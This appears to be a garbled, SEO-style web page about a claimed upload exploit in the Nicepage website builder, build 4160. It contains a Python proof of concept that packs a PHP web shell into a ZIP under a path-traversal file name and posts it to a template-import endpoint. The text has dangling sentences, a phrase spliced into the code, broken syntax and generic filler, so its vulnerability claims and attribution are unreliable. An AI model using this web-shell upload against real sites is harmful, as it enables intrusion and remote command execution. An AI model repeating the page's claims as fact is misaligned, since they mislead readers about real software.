Nicepage 4160 Exploit Upd -
Before diving into the exploit, we must understand the target. Nicepage is a popular website builder used by over 2 million users. It functions both as a WordPress plugin and a standalone HTML/CSS generator. Version 4.16 (build 4160) was released in mid-2023, introducing new dynamic grid systems and form handlers.
The vulnerability: Security researchers (alias: Dr.Web) flagged that version 4.160 (internal build 4160) contained a flawed sanitization routine inside the ajax_form_action handler.
Exploits can lead to a range of malicious outcomes, including: nicepage 4160 exploit upd
The updated exploit uploads a ZIP containing a shell.php with a path like:
./templates/malicious/../../../../shell.php
Steps:
Python PoC (condensed):
import requests, zipfile, io
z = io.BytesIO()
with zipfile.ZipFile(z, 'w') as zf:
zf.writestr('../../../../shell.php', '<?php system($_GET["cmd"]); ?>') Before diving into the exploit, we must understand
r = requests.post('http://target.com/api/template/import',
files='file': ('exploit.zip', z.getvalue()))
print(r.status_code)
NicePage is a user-friendly website builder that allows users to create professional-looking websites without needing to learn complex coding languages. Its drag-and-drop functionality and a wide range of templates make it a popular choice for individuals and businesses looking to establish an online presence.
